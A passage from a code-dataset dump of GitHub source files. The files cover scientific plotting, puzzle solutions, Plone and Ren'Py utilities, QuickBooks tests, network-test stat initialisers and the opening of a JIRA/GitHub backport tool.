line.startswith(\"#\"):\n continue \n if line.startswith('\"') and line.endswith('\"'):\n line = line[1:-1]\n \n header = line.lower().replace(' ','_')\n header = header.replace('\\\\n','_')\n header = header.replace('!','')\n header = header.replace(',','')\n header = header.replace(':','')\n header = header.replace('?','')\n header = header.replace('.','')\n header = header.replace('+','')\n header = header.replace('-','')\n header = 
header.replace('(','')\n header = header.replace(')','')\n header = header.replace(\"'\",'')\n \n print (' ', line,'', sep='')\n \n FindFileContaingString(header, line)\n \n \nReadFile(sys.argv[1])","repo_name":"NightscoutFoundation/xDrip","sub_path":"etc/FixLangs/CreateTranslations.py","file_name":"CreateTranslations.py","file_ext":"py","file_size_in_byte":3403,"program_lang":"python","lang":"en","doc_type":"code","stars":1208,"dataset":"github-code","pt":"60"} +{"seq_id":"72472765950","text":"import numpy as np \nimport scipy.integrate as spint \nfrom gen_var import dr,pel_pot, rp, rc, t_start, r\nimport scipy.interpolate as spit\nimport os \nimport romberg as ro \n\ndef renorm(r_raw, bins_raw):\n frac_left = np.sum(bins_raw)\n #Interpolation Information\n rpi = rp[t_start]\n rci = rc[t_start]\n f = spit.interp1d(np.flip(r_raw,axis = 0), np.flip(bins_raw, axis = 0), \n fill_value = 'extrapolate', kind = 'quadratic')\n g = spit.PchipInterpolator(np.flip(r_raw, axis = 0), np.flip(bins_raw, axis = 0), extrapolate = 'true')\n low_int = next(p[0] for p in enumerate(r) if p[1] > r_raw[-1]) - 1\n up_int = next(p[0] for p in enumerate(r) if p[1] > r_raw[0])\n\n low = next(p[0] for p in enumerate(r) if p[1] > rpi)\n up = next(p[0] for p in enumerate(r) if p[1] > rci)\n\n r1 = r[low_int]\n r2 = r[up_int]\n r_int = np.linspace(rpi,rci, num = 1 + 2**10, endpoint = 'True')\n n_romb = len(r)\n bins_full = f(r_int)\n integrated = spint.romb(bins_full, dx = -r_int[0] + r_int[1])\n dens_full = bins_full[:]/integrated\n return bins_full, dens_full, r_int","repo_name":"fkmart/Pellet-Ablation","sub_path":"FUNC_renorm_dens.py","file_name":"FUNC_renorm_dens.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"1225164830","text":"import typing\r\n\r\n\r\ndef main() -> typing.NoReturn:\r\n n = int(input())\r\n\r\n # n = h * w + r\r\n # minimize |h - w| + r\r\n\r\n # inf = 1 << 60\r\n mn = n # h = 0\r\n for h in range(1, n + 1):\r\n if h * h > n:\r\n break\r\n w = n // h\r\n\r\n mn = min(mn, w - h + n - w * h)\r\n print(mn)\r\n\r\n\r\nmain()\r\n","repo_name":"kagemeka/atcoder-submissions","sub_path":"jp.atcoder/abc040/abc040_b/28229207.py","file_name":"28229207.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"30102231344","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nfrom itertools import product\nimport numpy as np\nimport xarray as xr\nfrom matplotlib import pyplot as plt\nimport cartopy.crs as ccrs\nimport cartopy.feature as cfeature\nfrom scipy.ndimage import median_filter\nimport seaborn as sns\nfrom cartopy.mpl.gridliner import LONGITUDE_FORMATTER, LATITUDE_FORMATTER\n\nfrom scipy import signal\n\ndef gaussKern(size):\n \"\"\"\n Calculate a normalised Gaussian kernel to apply as a smoothing\n function.\n\n :param int size: the size of the kernel to use (how many points will be\n used in the smoothing operation).\n :returns: :class:`numpy.ndarray` normalised 2D kernel array for use in\n convolutions\n \"\"\"\n size = int(size)\n x, y = np.mgrid[-size:size + 1, -size:size + 1]\n g = np.exp(-(x**2/float(size) + y**2/float(size)))\n return g / g.sum()\n\ndef smooth(im, n=15):\n \"\"\"\n Smooth a 2D array `im` by convolving with a Gaussian kernel of size `n`.\n\n :param im: Array of values to be smoothed\n :type im: :class:`numpy.ndarray`\n :param int n: Number of points to include in the 
smoothing.\n\n :returns: smoothed array (same dimensions as the input array)\n\n \"\"\"\n g = gaussKern(n)\n improc = signal.convolve2d(im, g, mode='same', boundary='symm')\n return improc\n\ndef subset(ds, extent):\n\n data = ds.sel(\n lat=slice(extent[3], extent[2]),\n lon=slice(extent[0], extent[1])\n )\n return data\n\ndatapath = '/scratch/w85/swhaq/hazard/output/QLD'\ndatapath = '/g/data/w85/QFES_SWHA/hazard/output/'\ngroups = ['GROUP1', 'GROUP2']\nrcps = ['RCP45', 'RCP85']\nperiods = ['2021-2040', '2041-2060', '2061-2080', '2081-2100']\n\nextent = (150, 155, -30, -24)\nbbox = dict(boxstyle=\"round\", fc=\"white\", alpha=0.5)\n\ng = 'GROUP1'\nrlabel = {'RCP45': 'RCP 4.5', 'RCP85': 'RCP 8.5'}\np = '2081-2100'\naris = [50, 100, 500, 2000]\nfigsize=(12, 10)\nprj = ccrs.PlateCarree()\nborders = cfeature.NaturalEarthFeature(\n category='cultural',\n name='admin_1_states_provinces_lines',\n scale='10m',\n facecolor='none')\n\npalette = [(1, 1, 1),\n (0.000, 0.627, 0.235),\n (0.412, 0.627, 0.235),\n (0.663, 0.780, 0.282),\n (0.957, 0.812, 0.000),\n (0.925, 0.643, 0.016),\n (0.835, 0.314, 0.118),\n (0.780, 0.086, 0.118)]\ncmap = sns.blend_palette(palette, as_cmap=True)\nlevels = np.arange(30, 101., 5.)\nlevelskmh = np.arange(50, 351, 25.)\n\nfor g in groups:\n for r in rcps:\n for p in periods:\n scenario = f'{g}_{r}_{p}'\n fname = os.path.join(datapath, scenario, 'hazard', 'hazard_rel_hist.nc')\n print(f\"Processing {fname}\")\n ds = xr.open_dataset(fname)\n lats = ds.lat.sel(lat=slice(extent[3], extent[2])).values\n lons = ds.lon.sel(lon=slice(extent[0], extent[1])).values\n lat, lon = np.meshgrid(lats, lons)\n dx = np.mean(np.diff(ds.lon.values))\n\n for ari in aris:\n fig, ax = plt.subplots(1, 1, subplot_kw={'projection':prj})\n title = f\"1:{ari} AEP wind speed - {p}\"\n data = subset(ds.wspd.sel({'ari': ari}), extent)\n sdata = smooth(data, int(1/dx))\n cs = ax.contourf(lon, lat, sdata.T, levels=levels, extend='both', cmap=cmap)\n plt.colorbar(cs, extend='both', label=\"AEP wind speed [m/s]\", ax=ax)\n ax.set_extent(extent)\n ax.coastlines(resolution='10m')\n ax.add_feature(borders, edgecolor='k', linewidth=0.5)\n gl = ax.gridlines(draw_labels=True, linestyle='--')\n gl.top_labels = False\n gl.right_labels = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 'x-small'}\n gl.ylabel_style = {'size': 'x-small'}\n ax.set_title(title)\n plt.tight_layout()\n outputfile = os.path.join(datapath, scenario, 'plots', f'hazard.{ari}.mps.png')\n plt.savefig(outputfile, bbox_inches='tight')\n plt.close(fig)\n\nfor p in periods:\n for ari in aris:\n fig, axes = plt.subplots(2, 2, figsize=(10, 10),\n subplot_kw={'projection':prj},\n sharex=True, sharey=True)\n ax = axes.flatten()\n for i, (g, r) in enumerate(product(groups, rcps)):\n print(f\"Plotting hazard for {g} - {r} - {p} - {ari}\")\n suptitle = f\"1:{ari} AEP wind speed - {p}\"\n scenario = f\"{g}_{r}_{p}\"\n fname = os.path.join(datapath, scenario, 'hazard', 'hazard_rel_hist.nc')\n ds = xr.open_dataset(fname)\n data = subset(ds.wspd.sel({'ari': ari}), extent)\n lats = ds.lat.sel(lat=slice(extent[3], extent[2])).values\n lons = ds.lon.sel(lon=slice(extent[0], extent[1])).values\n lat, lon = np.meshgrid(lats, lons)\n sdata = smooth(data, int(1/dx))\n cs = ax[i].contourf(lon, lat, 3.6*sdata.T, levels=levelskmh, extend='both', cmap=cmap)\n title = f\"{g} {rlabel[r]}\"\n ax[i].set_extent(extent)\n ax[i].coastlines(resolution='10m')\n ax[i].add_feature(borders, edgecolor='k', linewidth=0.5)\n 
gl = ax[i].gridlines(draw_labels=True, linestyle='--')\n gl.top_labels = False\n gl.right_labels = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 'x-small'}\n gl.ylabel_style = {'size': 'x-small'}\n ax[i].text(0.5, 0.95, title, ha='center', va='center', fontsize='small',transform=ax[i].transAxes, bbox=bbox)\n fig.subplots_adjust(right=0.875, wspace=0.1, hspace=0.05, top=0.95)\n cbar_ax = fig.add_axes([0.9, 0.15, 0.025, 0.7])\n cbarlabel = \"AEP wind speed [km/h]\"\n fig.colorbar(cs, cax=cbar_ax, label=cbarlabel)\n #plt.tight_layout()\n fig.suptitle(suptitle)\n outputfile = os.path.join(datapath, f'hazard.{ari}.{p}.kmh.png')\n plt.savefig(outputfile, bbox_inches='tight')\n plt.close(fig)\n\n# Plot historic hazard:\nprint(\"Plotting historic data\")\n\nfname = os.path.join(datapath, 'HISTORICAL_1981-2010', 'hazard', 'hazard.nc')\nds = xr.open_dataset(fname)\nlats = ds.lat.sel(lat=slice(extent[3], extent[2])).values\nlons = ds.lon.sel(lon=slice(extent[0], extent[1])).values\nlat, lon = np.meshgrid(lats, lons)\ndx = np.mean(np.diff(ds.lon.values))\n\nfor ari in aris:\n fig, ax = plt.subplots(1, 1, subplot_kw={'projection':prj})\n title = f\"1:{ari} AEP wind speed - 1981-2010\"\n data = subset(ds.wspd.sel({'ari': ari}), extent)\n sdata = smooth(data, int(1/dx))\n cs = ax.contourf(lon, lat, 3.6*sdata.T, levels=levelskmh, extend='both', cmap=cmap)\n plt.colorbar(cs, extend='both', label=\"AEP wind speed [km/h]\", ax=ax)\n ax.set_extent(extent)\n ax.coastlines(resolution='10m')\n ax.add_feature(borders, edgecolor='k', linewidth=0.5)\n gl = ax.gridlines(draw_labels=True, linestyle='--')\n gl.top_labels = False\n gl.right_labels = False\n gl.xformatter = LONGITUDE_FORMATTER\n gl.yformatter = LATITUDE_FORMATTER\n gl.xlabel_style = {'size': 'x-small'}\n gl.ylabel_style = {'size': 'x-small'}\n ax.set_title(title)\n plt.tight_layout()\n outputfile = os.path.join(datapath, 'HISTORICAL_1981-2010', 'plots', f'hazard.{ari}.kmh.png')\n plt.savefig(outputfile, bbox_inches='tight')\n plt.close(fig)","repo_name":"GeoscienceAustralia/SWHAQ","sub_path":"scripts/plotting/plotHazardMap.py","file_name":"plotHazardMap.py","file_ext":"py","file_size_in_byte":7597,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"29963941133","text":"__author__ = \"\"\"unknown \"\"\"\n__docformat__ = 'plaintext'\n\nfrom AccessControl import ClassSecurityInfo\nfrom Products.Archetypes.atapi import *\nfrom zope import interface\nfrom zope.interface import implements\nimport interfaces\nfrom Products.Communities.interfaces.csiruser import ICSIRUser\nfrom Products.CMFDynamicViewFTI.browserdefault import BrowserDefaultMixin\n\n# imports needed by remember\nfrom Products.remember.content.member import BaseMember\nfrom Products.remember.permissions import \\\n VIEW_PUBLIC_PERMISSION, EDIT_ID_PERMISSION, \\\n EDIT_PROPERTIES_PERMISSION, VIEW_OTHER_PERMISSION, \\\n VIEW_SECURITY_PERMISSION, EDIT_PASSWORD_PERMISSION, \\\n EDIT_SECURITY_PERMISSION, MAIL_PASSWORD_PERMISSION, \\\n ADD_MEMBER_PERMISSION\nfrom AccessControl import ModuleSecurityInfo\nfrom Products.Communities.config import *\n\n# additional imports from tagged value 'import'\nfrom Products.CMFCore.utils import getToolByName\n\n##code-section module-header #fill in your manual code here\n##/code-section module-header\n\nschema = Schema((\n\n StringField(\n name='defaultCommunity',\n widget=SelectionWidget(\n label='Defaultcommunity',\n 
label_msgid='Communities_label_defaultCommunity',\n i18n_domain='Communities',\n ),\n vocabulary=\"getMyCommunities\",\n searchable=1,\n ),\n\n),\n)\n\n##code-section after-local-schema #fill in your manual code here\n##/code-section after-local-schema\n\nCSIRUser_schema = BaseSchema.copy() + \\\n BaseMember.schema.copy() + \\\n ExtensibleMetadata.schema.copy() + \\\n schema.copy()\n\n##code-section after-schema #fill in your manual code here\n##/code-section after-schema\n\nclass CSIRUser(BaseMember, BrowserDefaultMixin, BaseContent):\n \"\"\"\n \"\"\"\n security = ClassSecurityInfo()\n\n implements(interfaces.ICSIRUser, ICSIRUser)\n\n meta_type = 'CSIRUser'\n _at_rename_after_creation = True\n\n schema = CSIRUser_schema\n\n base_archetype = BaseContent\n\n ##code-section class-header #fill in your manual code here\n ##/code-section class-header\n\n\n # A member's __call__ should not render itself, this causes recursion\n def __call__(self, *args, **kwargs):\n return self.getId()\n \n\n # Methods\n\n security.declarePublic('getMyCommunities')\n def getMyCommunities(self):\n \"\"\"\n \"\"\"\n ctool = getToolByName(self, 'portal_communitytool')\n communities = ctool.getMyCommunities()\n\n result = [('None', '')]\n #community = ctool.getDefaultCommunity()\n #result += [(community.id, community.title_or_id())]\n for community in communities:\n result += [(community.id, community.title_or_id())]\n return result\n\n\nregisterType(CSIRUser, PROJECTNAME)\n# end of class CSIRUser\n\n##code-section module-footer #fill in your manual code here\n##/code-section module-footer\n\n\n\n","repo_name":"BGCX261/zmetadata-svn-to-git","sub_path":"trunk/Communities/content/csiruser.py","file_name":"csiruser.py","file_ext":"py","file_size_in_byte":2893,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5145791241","text":"from turtle import Turtle,Screen\nimport random\n\npen = Turtle()\n\ncolors = [\"CornflowerBlue\",\"IndianRed\",\"DeepSkyBlue\",\"DarkOrchid\",\"wheat\",\"SeaGreen\",\"SlateGray\"]\n\ndirections = [0,90,180,270]\n\npen.pensize(10)\npen.speed(\"fastest\")\n\nfor _ in range(200):\n pen.color(random.choice(colors))\n pen.forward(30)\n pen.setheading(random.choice(directions))\n\nscreen=Screen()\nscreen.exitonclick()","repo_name":"Upendra2003/Python-Graphics","sub_path":"Random_Walk/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"879421655","text":"from pythonpackages.renpy_utility.renpy_custom_log import *\n\n__all__ = [\n \"update_flags\",\n \"get_flags\",\n \"set_flags\",\n]\n\n\ndef update_flags(flags: dict[str, bool], flag_keys: list[str]):\n \"\"\"update flags by making it with the same elements of flag_keys. 
in case you have to add them set them as False\"\"\"\n # check if there are less elements than flag_keys\n # in case you add them set with False\n for x in flag_keys:\n if (not (x in flags)):\n flags[x] = False\n # check if there are more elements than flag_keys\n # in case it eliminates them\n flags_to_del = []\n for x in flags:\n if (not (x in flag_keys)):\n flags_to_del.append(x)\n for x in flags_to_del:\n del flags[x]\n del flags_to_del\n return flags\n\n\ndef get_flags(flag_id: str, flags: dict[str, bool]) -> bool:\n \"\"\"returns the value of the flag_id in flags\"\"\"\n if (flag_id in flags):\n return flags[flag_id]\n else:\n return False\n\n\ndef set_flags(flag_id: str, value: bool, flags: dict[str, bool]):\n flags[flag_id] = value\n return\n","repo_name":"DRincs-Productions/renpy-utility-lib","sub_path":"pythonpackages/renpy_utility/flags.py","file_name":"flags.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"71236906110","text":"import sys\nsys.stdin = open(\"구슬 굴리기.txt\")\n\ndef find(r,c):\n global cnt\n x, y = r, c\n # 1번 윗 방향 2번 아랫방향, 3번 왼쪽, 4번 오른쪽\n dr = [0, -1, 1, 0, 0]\n dc = [0, 0, 0, -1, 1]\n i=0\n while i < len(data):\n r = r + dr[data[i]]\n c = c + dc[data[i]]\n if arr[r][c] == '0':\n arr[r][c] = '9'\n cnt += 1\n elif arr[r][c] == '1':\n r = r - dr[data[i]]\n c = c - dc[data[i]]\n i += 1\n\n\n\n\n\n\n\n\nR, C = map(int, input().split())\narr = [['1' for _ in range(C+2)] for _ in range(R+2)]\nfor i in range(1, R+1):\n arr[i] = ['1'] + list((input())) + ['1']\nN = int(input())\ndata = list(map(int, input().split()))\ncnt = 1\nfor i in range(1, R + 2):\n for j in range(1, C + 2):\n if arr[i][j] == '2':\n find(i, j)\n\nprint(cnt)\n# for i in range(R+2):\n# for j in range(C+2):\n# print(arr[i][j], end=\" \")\n# print()","repo_name":"hoyoung2176/TIL","sub_path":"Algorithm/test/IM/D03/구슬굴리기.py","file_name":"구슬굴리기.py","file_ext":"py","file_size_in_byte":948,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73594615839","text":"from collections import namedtuple\nfrom realms_cli.caller_invoker import wrapped_send, declare\nfrom realms_cli.deployer import logged_deploy\nfrom realms_cli.config import Config, strhex_as_strfelt, safe_load_deployment\nfrom realms_cli.utils import str_to_felt\n\nContracts = namedtuple('Contracts', 'alias contract_name id')\n\n# STEPS\n# 0. Set new names in array accordingly to the tuple structure\n# 1. Deploy implementation\n# 2. Deploy proxy\n# 3. 
Initialise\n\nNEW_MODULES = [\n Contracts(\"Adventurer\", \"Adventurer\", \"14\"),\n]\n\n# Realms\nLOOT = str_to_felt(\"LOOT\")\nLOOT_SYMBOL = str_to_felt(\"LOOT\")\n\nADVENTURER = str_to_felt(\"ADVENTURER\")\nADVENTURER_SYMBOL = str_to_felt(\"ADVENTURER\")\n\n\ndef run(nre):\n\n config = Config(nre.network)\n\n #---------------- SET MODULES ----------------#\n\n for contract in NEW_MODULES:\n\n logged_deploy(\n nre,\n contract.contract_name,\n alias=contract.alias,\n arguments=[],\n )\n\n declare(contract.contract_name, contract.alias)\n\n predeclared_class = nre.get_declaration(contract.alias)\n\n logged_deploy(\n nre,\n 'PROXY_Logic',\n alias='proxy_' + contract.alias,\n arguments=[strhex_as_strfelt(predeclared_class)],\n )\n\n #---------------- INIT MODULES ----------------#\n\n for contract in NEW_MODULES:\n\n wrapped_send(\n network=config.nile_network,\n signer_alias=config.ADMIN_ALIAS,\n contract_alias=\"proxy_\" + contract.contract_name,\n function=\"initializer\",\n arguments=[ADVENTURER, ADVENTURER_SYMBOL, strhex_as_strfelt(\n config.ADMIN_ADDRESS), strhex_as_strfelt(config.XOROSHIRO_ADDRESS), strhex_as_strfelt(config.LOOT_PROXY_ADDRESS), strhex_as_strfelt(config.XOROSHIRO_ADDRESS), strhex_as_strfelt(config.LORDS_PROXY_ADDRESS)],\n )\n","repo_name":"velarxneo/monstersrealms","sub_path":"realms-contracts/realms_cli/loot/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":1875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"14573678751","text":"import time\nfrom datetime import datetime\n\nfrom quickbooks.objects import Transfer\nfrom quickbooks.objects.account import Account\nfrom quickbooks.objects.creditcardpayment_entity import CreditCardPayment\nfrom tests.integration.test_base import QuickbooksTestCase\n\n\nclass CreditCardPaymentEntityTest(QuickbooksTestCase):\n def setUp(self):\n time.sleep(3) # Used to prevent error code 3001 - The request limit was reached.\n super(CreditCardPaymentEntityTest, self).setUp()\n\n self.account_number = datetime.now().strftime('%d%H%M')\n self.name = \"Test CreditCardPaymentEntityTest {0}\".format(self.account_number)\n\n def test_create(self):\n credit_card_account = Account()\n credit_card_account.Name = \"Credit Card Account {0}\".format(self.account_number)\n credit_card_account.AccountType = \"Credit Card\"\n credit_card_account.AccountSubType = \"CreditCard\"\n credit_card_account.save(qb=self.qb_client)\n\n accounts = Account.where(\n \"Classification = 'Asset' AND FullyQualifiedName != 'Accounts Receivable (A/R)'\",\n max_results=1, qb=self.qb_client)\n\n from_account = accounts[0]\n to_account = credit_card_account\n\n credit_card_payment = CreditCardPayment()\n credit_card_payment.Amount = 100\n credit_card_payment.BankAccountRef = from_account.to_ref()\n credit_card_payment.CreditCardAccountRef = to_account.to_ref()\n\n credit_card_payment.save(qb=self.qb_client)\n\n query_credit_card_payment = CreditCardPayment.get(credit_card_payment.Id, qb=self.qb_client)\n\n self.assertEqual(query_credit_card_payment.Id, credit_card_payment.Id)\n self.assertEqual(query_credit_card_payment.Amount, 100)\n self.assertEqual(query_credit_card_payment.BankAccountRef.value, from_account.Id)\n self.assertEqual(query_credit_card_payment.CreditCardAccountRef.value, to_account.Id)\n\n # reset transfer (so the from_account doesn't run out of cash)\n # I wonder if we can do a transfer from credit_card_account to a bank_account\n transfer = Transfer()\n transfer.Amount = 100\n 
transfer.FromAccountRef = to_account.to_ref()\n transfer.ToAccountRef = from_account.to_ref()\n\n transfer.save(qb=self.qb_client)\n\n def test_update(self):\n credit_card_payment = CreditCardPayment.all(max_results=1, qb=self.qb_client)[0]\n credit_card_payment.Amount += 1\n credit_card_payment.save(qb=self.qb_client)\n\n query_credit_card_payment = CreditCardPayment.get(credit_card_payment.Id, qb=self.qb_client)\n\n self.assertEqual(query_credit_card_payment.Amount, credit_card_payment.Amount)\n","repo_name":"ej2/python-quickbooks","sub_path":"tests/integration/test_creditcardpayment_entity.py","file_name":"test_creditcardpayment_entity.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":353,"dataset":"github-code","pt":"51"} +{"seq_id":"3908261924","text":"from dicts import SpyTestDict\n\n\ndef port_stats_init(stats=None):\n stats = stats or SpyTestDict()\n stats.clear()\n stats.framesSent = 0\n stats.bytesSent = 0\n stats.framesReceived = 0\n stats.bytesReceived = 0\n stats.oversizeFramesReceived = 0\n stats.userDefinedStat1 = 0\n stats.userDefinedStat2 = 0\n stats.captureFilter = 0\n return stats\n\n\ndef dhcpc_stats_aggregate_init(port_name):\n res = SpyTestDict()\n res.port_name = port_name\n res.offer_rx_count = 0\n res.success_percentage = 0\n res.release_tx_count = 0\n res.setup_success = 0\n res.ack_rx_count = 0\n res.rx = SpyTestDict()\n res.rx.force_renew = 0\n res.enabled_interfaces = 0\n res.currently_idle = 0\n res.addr_discovered = 0\n res.teardown_initiated = 0\n res.teardown_success = 0\n res.total_failed = 0\n res.request_tx_count = 0\n res.discover_tx_count = 0\n res.currently_attempting = 0\n res.nak_rx_count = 0\n res.sessions_total = 0\n res.sessions_not_started = 0\n res.setup_fail = 0\n res.total_attempted = 0\n res.avgerage_teardown_rate = 0\n res.setup_initiated = 0\n res.currently_bound = 0\n res.teardown_failed = 0\n res.declines_tx_count = 0\n res.average_setup_time = 0\n return res\n\n\ndef dhcpc_stats_session_init(handle):\n res = SpyTestDict()\n res.lease_time = 3600\n res.address = \"\"\n res.device_group = \"\"\n res.port_name = handle\n res.protocol = \"\"\n res.offer_rx_count = 1\n res.information = \"none\"\n res.release_tx_count = 0\n res[\"discover/rapid_commit_tx\"] = 0\n res.ack_rx_count = 1\n res.rx = SpyTestDict()\n res.rx.force_renew = 0\n res.gateway = \"\"\n res.ip_addr = \"0.0.0.0\"\n res.Address = \"\"\n res.device_id = 0\n res.status = \"\"\n res.request_tx_count = 1\n res.discover_tx_count = 1\n res.lease_establishment_time = 12\n res[\"ack/rapid_commit_rx\"] = 0\n res.nak_rx_count = 0\n res.topology = \"\"\n res[\"lease/rapid_commit\"] = \"\"\n res.Gateway = \"\"\n res.Prefix = 24\n res.declines_tx_count = 0\n return res\n\n\ndef dhcps_stats_aggregate_init(port_name):\n res = SpyTestDict()\n res.port_name = port_name\n res.rx = SpyTestDict()\n res.rx.solicit = 0\n res.rx.confirm = 0\n res.rx.renew = 0\n res.rx.rebind = 0\n res.rx.request = 0\n res.rx.decline = 0\n res.rx.release = 0\n res.rx.inform = 0\n res.rx.relay_forward = 0\n res.rx.relay_reply = 0\n res.tx = SpyTestDict()\n res.tx.advertisement = 0\n res.tx.reply = 0\n res.total_addresses_allocated = 0\n res.total_addresses_renewed = 0\n res.current_addresses_allocated = 0\n res.total_prefixes_allocated = 0\n res.total_prefixes_renewed = 0\n res.current_prefixes_allocated = 0\n res.reconfigure_tx = 0\n res.sessions_up = 0\n res.sessions_down = 0\n res.sessions_not_started = 0\n res.session_total = 0\n res.nak_sent = 0\n 
res.solicits_ignored = 0\n return res\n","repo_name":"sonic-net/sonic-mgmt","sub_path":"spytest/spytest/tgen/scapy/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2920,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"51"} +{"seq_id":"41698019496","text":"import json\nimport os\nimport re\n\nfrom github import Github, GithubException\nfrom jira import JIRA, JIRAError\n\nimport git as g\nfrom requests.exceptions import MissingSchema\n\nimport JIRAUtils\nfrom GUI import GUI\n\n\nclass MainController:\n def __init__(self):\n # - - - - - - - - - - - - - - - - - - - - -\n # JIRA Credentials\n self.jira_url = None\n self.jira_username = None\n self.jira_password = None\n\n # - - - - - - - - - - - - - - - - - - - - -\n # GitHub Credential\n self.github_username = None\n self.github_password = None\n\n # - - - - - - - - - - - - - - - - - - - - -\n # Backport Fields\n self.service_pack = None\n self.assignee = None\n self.base_folder = None\n\n # - - - - - - - - - - - - - - - - - - - - -\n # Merge Masters\n self.master1 = None\n self.master2 = None\n\n self.jira_connection = None\n self.github_connection = None\n self.backports = None\n\n # Create the entire GUI program\n self.gui = GUI(self)\n\n # Start the GUI event loop\n self.gui.window.mainloop()\n\n # Get SP cases for a given assignee and service pack.\n def get_sp_cases(self):\n self.gui.clear_logs()\n self.jira_url = self.gui.jira_url_input.get().strip()\n self.jira_username = self.gui.jira_user_input.get().strip()\n self.jira_password = self.gui.jira_password_input.get()\n self.service_pack = self.gui.service_pack_input.get().strip()\n self.assignee = self.gui.assignee_input.get().strip()\n\n if self.assignee:\n self.gui.log_info(\"Getting \" + self.assignee + \"'s SP cases for \" + self.service_pack + \"...\")\n else:\n self.gui.log_info(\"Getting SP cases for \" + self.service_pack + \"...\")\n\n # Connect to JIRA.\n try:\n self.gui.log_info(\"Connecting to JIRA...\")\n self.jira_connection = JIRA(server=self.jira_url, basic_auth=(self.jira_username, self.jira_password))\n except MissingSchema as me:\n self.gui.log_error(\"Unable to connect to JIRA: \" + str(me))\n return\n except JIRAError as je:\n self.gui.log_error(\"Unable to connect to JIRA: \" + je.text)\n return\n\n # Get Open and In Progress SP cases.\n try:\n sp_cases = JIRAUtils.get_sp_cases(self.jira_connection, self.service_pack, self.assignee)\n except JIRAError as je:\n self.gui.log_error(\"Unable to fetch SP Cases: \" + je.text)\n return\n\n # Update list of SP cases to be backported.\n self.gui.update_sp_list(sp_cases)\n self.gui.log_info(str(len(sp_cases)) + \" SP cases added.\")\n\n # Backport the selected SP cases.\n def backport(self):\n self.gui.clear_logs()\n self.gui.log_info(\"Starting to Backport...\")\n\n # Connect to GitHub.\n self.github_username = self.gui.github_user_input.get().strip()\n self.github_password = self.gui.github_password_input.get()\n try:\n self.github_connection = Github(self.github_username, self.github_password)\n me = self.github_connection.get_user(self.github_username)\n except GithubException as ge:\n self.gui.log_error(\"Unable to connect to GitHub: \" + ge.data['message'])\n self.gui.log_info(\"Done!\")\n return\n\n self.base_folder = self.gui.base_folder_input.get().strip()\n\n # Go through all SP cases\n sp_keys = [sp.split(' ')[0].replace('[', '').replace(']', '') for sp in self.gui.backports_listbox.get()]\n for sp_key in sp_keys:\n\n # Apply the Begin Work 
transition for the SP case.\n issue = self.jira_connection.issue(sp_key)\n self.jira_connection.assign_issue(issue, self.jira_username)\n if issue.fields.status.name == 'Open':\n self.jira_connection.transition_issue(issue.key, '11')\n\n # Get data from the JIRA Developer plugin.\n # Get Base Bug commits.\n self.gui.log_info(\"Backporting \" + sp_key + \"!\")\n base_bug = JIRAUtils.get_base_bug(self.jira_connection, sp_key)\n raw_data = JIRAUtils.get_data(self.jira_connection, base_bug)\n repositories = raw_data['detail'][0]['repositories']\n rep_names = [rep['name'] for rep in repositories]\n\n # Search for missing commits.\n # Find \"PR: \" patterns in JIRA case comments.\n jira_comments = [[re.search(r'(?<=PR:).*', body).group(0) for body in\n comment.body.encode(\"ascii\", errors=\"ignore\").decode().replace(\"\\r\\n\", \"\\n\").replace(\"\\r\", \"\\n\").split('\\n') if\n re.search(r'(?<=PR:).*', body) is not None] for comment in\n self.jira_connection.issue(base_bug.key).fields.comment.comments]\n links_in_comments = [item.strip() for sublist in jira_comments for item in sublist]\n\n # Check if there are missing commits in JIRA Developer plugin.\n for rep_name in rep_names:\n for not_missing_link in links_in_comments:\n # Commits are on JIRA Developer Plugin.\n if rep_name in not_missing_link:\n break\n\n # Commits are missing\n upstream_repo = me.get_repo(rep_name).parent\n try:\n pr = upstream_repo.get_pull(not_missing_link.split('/')[-1])\n except:\n continue\n for commit in pr.get_commits().get_page(0):\n rep_name = commit.html_url.split('/')[4]\n sha = commit.html_url.split('/')[-1]\n repositories.append({'name': rep_name,\n 'commits': [\n {'message': \"Missing Commit\", 'id': sha, 'url': commit.html_url,\n 'authorTimestamp': 1}]})\n if not rep_names:\n for missing_link in links_in_comments:\n # All commits are missing\n rep_name = missing_link.split('/')[-3]\n pr_nr = missing_link.split('/')[-1]\n pr_nr = int(''.join([i for i in pr_nr if i.isdigit()]))\n\n upstream_repo = me.get_repo(rep_name).parent\n try:\n pr = upstream_repo.get_pull(pr_nr)\n except:\n continue\n for commit in pr.get_commits().get_page(0):\n rep_name = commit.html_url.split('/')[4]\n sha = commit.html_url.split('/')[-1]\n repositories.append({'name': rep_name,\n 'commits': [\n {'message': \"Missing Commit\", 'id': sha, 'url': commit.html_url,\n 'authorTimestamp': 1}]})\n\n # Initialize JIRA comment.\n jira_comment = \"*Attention: This is the outcome of an automated process!*\"\n jira_comment += \"\\nPRs:\"\n\n # Go through all repositories.\n for repository in repositories:\n has_merge_conflicts = False\n self.gui.log_info(\"Creating the \" + sp_key + \" branch in \" + repository['name'] + \".\")\n\n # Check if we have the repository in place.\n repo_path = 